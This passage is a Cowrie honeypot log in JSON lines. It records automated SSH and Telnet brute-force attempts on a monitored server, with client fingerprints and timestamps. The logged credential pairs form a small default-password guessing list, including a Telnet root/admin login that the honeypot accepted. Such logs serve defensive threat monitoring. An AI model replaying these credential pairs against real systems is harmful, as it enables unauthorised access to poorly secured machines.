0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T04:44:18.901293Z","src_ip":"212.227.125.160","session":"c348bdc7da8c"}
{"eventid":"cowrie.login.failed","username":"esuser","password":"esuser","message":"login attempt [esuser/esuser] failed","sensor":"my-vps","timestamp":"2025-08-31T04:44:19.629500Z","src_ip":"212.227.125.160","session":"c348bdc7da8c"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":41298,"dst_ip":"1.2.3.4","dst_port":22,"session":"6509187cdca0","protocol":"ssh","message":"New connection: 212.227.235.229:41298 (1.2.3.4:22) [session: 6509187cdca0]","sensor":"my-vps","timestamp":"2025-08-31T04:44:19.912603Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-31T04:44:19.913907Z","src_ip":"212.227.235.229","session":"6509187cdca0"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":41314,"dst_ip":"1.2.3.4","dst_port":22,"session":"be0441b741f0","protocol":"ssh","message":"New connection: 212.227.235.229:41314 (1.2.3.4:22) [session: be0441b741f0]","sensor":"my-vps","timestamp":"2025-08-31T04:44:20.050705Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-31T04:44:20.108667Z","src_ip":"212.227.235.229","session":"be0441b741f0"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-31T04:44:20.161272Z","src_ip":"212.227.235.229","session":"6509187cdca0"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-31T04:44:20.547655Z","src_ip":"212.227.235.229","session":"be0441b741f0"}
{"eventid":"cowrie.session.closed","duration":"2.1","message":"Connection lost after 2.1 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:44:20.813550Z","src_ip":"212.227.125.160","session":"c348bdc7da8c"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":46324,"dst_ip":"1.2.3.4","dst_port":22,"session":"f0cf7f8da3e0","protocol":"ssh","message":"New connection: 212.227.235.229:46324 (1.2.3.4:22) [session: f0cf7f8da3e0]","sensor":"my-vps","timestamp":"2025-08-31T04:44:21.392104Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-31T04:44:21.446986Z","src_ip":"212.227.235.229","session":"f0cf7f8da3e0"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-31T04:44:21.674147Z","src_ip":"212.227.235.229","session":"f0cf7f8da3e0"}
{"eventid":"cowrie.login.failed","username":"admin","password":"admin@123","message":"login attempt [admin/admin@123] failed","sensor":"my-vps","timestamp":"2025-08-31T04:44:22.021100Z","src_ip":"212.227.235.229","session":"be0441b741f0"}
{"eventid":"cowrie.login.failed","username":"admin","password":"0l0ctyQh243O63uD","message":"login attempt [admin/0l0ctyQh243O63uD] failed","sensor":"my-vps","timestamp":"2025-08-31T04:44:22.301853Z","src_ip":"212.227.235.229","session":"6509187cdca0"}
{"eventid":"cowrie.login.failed","username":"guest","password":"guest","message":"login attempt [guest/guest] failed","sensor":"my-vps","timestamp":"2025-08-31T04:44:23.247844Z","src_ip":"212.227.235.229","session":"f0cf7f8da3e0"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":49130,"dst_ip":"1.2.3.4","dst_port":22,"session":"8752f9f62f3d","protocol":"ssh","message":"New connection: 212.227.125.160:49130 (1.2.3.4:22) [session: 8752f9f62f3d]","sensor":"my-vps","timestamp":"2025-08-31T04:44:23.308661Z"}
{"eventid":"cowrie.session.closed","duration":"3.8","message":"Connection lost after 3.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:44:23.676601Z","src_ip":"212.227.235.229","session":"6509187cdca0"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T04:44:23.716539Z","src_ip":"212.227.125.160","session":"8752f9f62f3d"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T04:44:23.717789Z","src_ip":"212.227.125.160","session":"8752f9f62f3d"}
{"eventid":"cowrie.session.closed","duration":"4.4","message":"Connection lost after 4.4 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:44:24.443377Z","src_ip":"212.227.235.229","session":"be0441b741f0"}
{"eventid":"cowrie.session.closed","duration":"3.2","message":"Connection lost after 3.2 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:44:24.549267Z","src_ip":"212.227.235.229","session":"f0cf7f8da3e0"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":41328,"dst_ip":"1.2.3.4","dst_port":22,"session":"98e8d90f5d8a","protocol":"ssh","message":"New connection: 212.227.235.229:41328 (1.2.3.4:22) [session: 98e8d90f5d8a]","sensor":"my-vps","timestamp":"2025-08-31T04:44:24.759328Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-31T04:44:24.824838Z","src_ip":"212.227.235.229","session":"98e8d90f5d8a"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-31T04:44:25.007359Z","src_ip":"212.227.235.229","session":"98e8d90f5d8a"}
{"eventid":"cowrie.login.failed","username":"postgres","password":"password","message":"login attempt [postgres/password] failed","sensor":"my-vps","timestamp":"2025-08-31T04:44:25.530528Z","src_ip":"212.227.125.160","session":"8752f9f62f3d"}
{"eventid":"cowrie.login.failed","username":"admin","password":"123456","message":"login attempt [admin/123456] failed","sensor":"my-vps","timestamp":"2025-08-31T04:44:26.802820Z","src_ip":"212.227.235.229","session":"98e8d90f5d8a"}
{"eventid":"cowrie.session.closed","duration":"3.8","message":"Connection lost after 3.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:44:27.087356Z","src_ip":"212.227.125.160","session":"8752f9f62f3d"}
{"eventid":"cowrie.session.closed","duration":"3.4","message":"Connection lost after 3.4 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:44:28.139709Z","src_ip":"212.227.235.229","session":"98e8d90f5d8a"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":35582,"dst_ip":"1.2.3.4","dst_port":22,"session":"8de355e55bf0","protocol":"ssh","message":"New connection: 212.227.125.160:35582 (1.2.3.4:22) [session: 8de355e55bf0]","sensor":"my-vps","timestamp":"2025-08-31T04:44:29.400292Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T04:44:29.401373Z","src_ip":"212.227.125.160","session":"8de355e55bf0"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":41602,"dst_ip":"1.2.3.4","dst_port":22,"session":"ddba7b4a82e2","protocol":"ssh","message":"New connection: 212.227.125.160:41602 (1.2.3.4:22) [session: ddba7b4a82e2]","sensor":"my-vps","timestamp":"2025-08-31T04:44:29.565397Z"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T04:44:29.591098Z","src_ip":"212.227.125.160","session":"8de355e55bf0"}
{"eventid":"cowrie.login.failed","username":"docker","password":"docker","message":"login attempt [docker/docker] failed","sensor":"my-vps","timestamp":"2025-08-31T04:44:30.161028Z","src_ip":"212.227.125.160","session":"8de355e55bf0"}
{"eventid":"cowrie.session.closed","duration":"2.0","message":"Connection lost after 2.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:44:31.353413Z","src_ip":"212.227.125.160","session":"8de355e55bf0"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":45922,"dst_ip":"1.2.3.4","dst_port":23,"session":"2f63ab3bf828","protocol":"telnet","message":"New connection: 212.227.125.160:45922 (1.2.3.4:23) [session: 2f63ab3bf828]","sensor":"my-vps","timestamp":"2025-08-31T04:44:33.247916Z"}
{"eventid":"cowrie.login.success","username":"root","password":"admin","message":"login attempt [root/admin] succeeded","sensor":"my-vps","timestamp":"2025-08-31T04:44:33.334954Z","src_ip":"212.227.125.160","session":"2f63ab3bf828"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T04:44:33.783916Z","src_ip":"212.227.125.160","session":"2f63ab3bf828"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T04:44:34.543681Z","src_ip":"212.227.125.160","session":"ddba7b4a82e2"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T04:44:34.544436Z","src_ip":"212.227.125.160","session":"ddba7b4a82e2"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":53812,"dst_ip":"1.2.3.4","dst_port":22,"session":"eb6082742a1b","protocol":"ssh","message":"New connection: 212.227.235.229:53812 (1.2.3.4:22) [session: eb6082742a1b]","sensor":"my-vps","timestamp":"2025-08-31T04:44:35.776786Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-31T04:44:35.886243Z","src_ip":"212.227.235.229","session":"eb6082742a1b"}
